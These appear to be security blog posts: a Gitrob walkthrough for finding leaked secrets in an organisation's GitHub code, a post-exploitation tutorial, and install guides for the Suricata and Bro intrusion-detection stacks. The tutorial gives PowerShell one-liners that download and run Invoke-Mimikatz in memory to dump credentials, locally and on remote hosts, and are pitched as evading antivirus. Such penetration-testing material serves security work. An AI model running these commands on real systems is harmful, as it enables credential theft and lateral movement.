Using Gitrob in your Penetration Testing.

Github is a remarkable place to collect data on a target, be it for a legitimate security engagement or to test your own security. It is a Ruby-based platform that can quickly build a local, searchable framework of all code released to Github by a particular organization. Once installation is complete, usability is trivial.

Screen Shot 2015-03-06 at 9.39.24 AM

gitrob -o <org>  (eg: gitrob -o aol)

Installation (assumes you are building on Kali):

  1. Navigate to /opt/ and issue the following:
    git clone
  2. Issue the following: sudo -u postgres -i
  3. Create your progress account and database with the following:
    createuser -s gitrob –pwprompt
    createdb -O gitrob gitrob
  4. For Gitrob to work properly, you will need to create an API key in your Github account.  This is quite simple. After assuring you are logged into github, navigate to and generate a new key.
    Copy the value as you will need it later.
    Screen Shot 2015-03-06 at 9.52.02 AM
  5. Issue the command “gem install gitrob” in the /opt/gitrob–0.0.5/
  6. Issue gitrob –configure (pasting your api key and password created during the postgres process).
  7. Finally, issue (gitrob -o orgname) and let it work. A web service will be spawned when it is complete that can be utilized for searching for leaked sensitive information.

Pro Tip:  You can easily print the browser tabs into PDF’s and echo the gitrob routine into a text file.  This is particularly useful for evidence in your reports.

Hat tip to Michael for the incredibly tool.

Post-Exploitation – Collecting credentials and staying off the disk.

collaboratearmitageIn the many penetration tests that I’ve conducted, one of the primary goals is to collect data for the use of lateral movement through the network, in a way that does trigger any alarms or alert in Antivirus/Endpoint solutions.  This technique will run in memory without actually installing anything to the disk.  This will aid in bypassing additional controls, such as Tripwire.

This is where I’ve found PowerSploit and more particularly, “Invoke-MimiKatz” to be very useful.  As Powershell is generally permitted in all environments, regardless of Application Whitelisting, using this module is incredibly powerful.

Giving credit where it is due, clymb3r originally created and posted the script that will be used in this short demo.

It is important to note that this is a post-exploitation module.  You will need to have compromised a host that also permitted the elevation of privileges.  However, domain escalation is not necessary.

From within PowerShell inside the compromised host, issue the following command:

powershell “IEX (New-Object Net.WebClient).DownloadString(‘’); Invoke-Mimikatz -DumpCreds”

You should see similar output in the console.  You can collect and use all of the credentials displayed for connecting to additional hosts in the environment.

Screen Shot 2015-03-04 at 8.00.44 AM

Windows 7


If you escalated to domain-level credentials, you can also issue the following command to collect credentials remotely from other hosts.  This is particularly useful for maintaining presence or viewing additional data on the network.

powershell “IEX (New-Object Net.WebClient).DownloadString(‘’); Invoke-Mimikatz -DumpCreds -ComputerName @(‘computer1’, ‘computer2’)”

This technique will not work in Windows 8/10, as new security provisions have been made.  However, I’ve seen very small deployment counts for those platforms, whereas XP and Windows 7 are still very much alive and well.

Screen Shot 2015-03-04 at 7.37.32 AM

Windows 10


Suricata / MongoDB / Splunk Installation

SuricataThe installation steps are outlined in Ubuntu 14 LTS minimal.

Before the installation of Suricata, FluentD and Mongo, perform the following:

sudo apt-get -y install libpcre3 libpcre3-dbg libpcre3-dev \
build-essential autoconf automake libtool libpcap-dev libnet1-dev \
libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 \
make libmagic-dev

Download, configure and install Suricata:

tar -xvzf suricata-2.0.5.tar.gz
cd suricata-2.0.5

./configure –prefix=/usr –sysconfdir=/etc –localstatedir=/var
sudo make install
sudo ldconfig

./configure && make && make install-full

By default, json logs are output to /var/log/suricata/eve.json

Download and install MongoDB

sudo apt-key adv –keyserver hkp:// –recv 7F0CEB10
echo ‘deb dist 10gen’ | sudo tee /etc/apt/sources.list.d/mongodb.list
sudo apt-get updatesudo
apt-get install -y mongodb-org
sudo service mongod start

Initial import can be completed by doing the following:

mongoimport –db filejsondb –collection filejson –file /var/log/suricata/eve.json


The universal Splunkforwarder can be used for real-time ingest into Splunk.

Install the most recent forwarder and perform the following steps:

./splunk add forward-server ipaddress:9997

./splunk add monitor /var/log/suricata/eve.json

BRO-IDS / Brownian / ElasticSearch Installation

bro-eyesWhile focusing on network security monitoring, Bro provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Bro has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyberinfrastructure. Bro’s user community includes major universities, research labs, supercomputing centers, and open-science communities.

I’ve found the Internet lacking of a straight-forward method for installing BRO-IDS with Brownian and Elasticsearch. Therefore, my hope is that this will ease the struggles of getting up and running.

Download and install Ubuntu 14.04 LTS.

Do not apply updates.

Install Java-7
apt-get install openjdk-7-jre-headless

Install Git
apt-get install git

Install ElasticSearch

Using the package manager, using the following:

wget -qO – | sudo apt-key add –

sudo add-apt-repository “deb stable main”

sudo apt-get update && sudo apt-get install elasticsearch

sudo update-rc.d elasticsearch defaults 95 10

service elasticsearch start

Load Prerequisites for BRO/ELS-JSON

apt-get install libcurl4-gnutls-dev

Manually compile and configure BRO


Install dependencies –

sudo apt-get install cmake make gcc g++ flex bison libpcap-dev libssl-dev python-dev swig zlib1g-dev

tar –xvf bro-2.3.1.tar.gz
cd bro-2.3.1


Make certain that cURL and Elasticsearch are displayed as supported.

make && make install

Add the following to the bottom of local.bro

@load tuning/logs-to-elasticsearch  

Installation of Brownian

git clone

python ./ /opt/Brownian
cd Brownian
source ./bin/activate

pip install git+

Change ELASTICSEARCH_SERVER in Brownian/lib/python2.X/site-packages/Brownian/ to your server’s hostname and port.

Change TIME_ZONE in to your desired timezone.

Set the local variables

export DJANGO_SETTINGS_MODULE=Brownian.settings

Configure the Server instance

python ./bin/ syncdb

nohup python ./bin/ runserver (public address:8000) &

You should now see data in the browser window.

Apply all updates

apt-get update && apt-get upgrade

All rights and respect to the Bro Project Copyrights.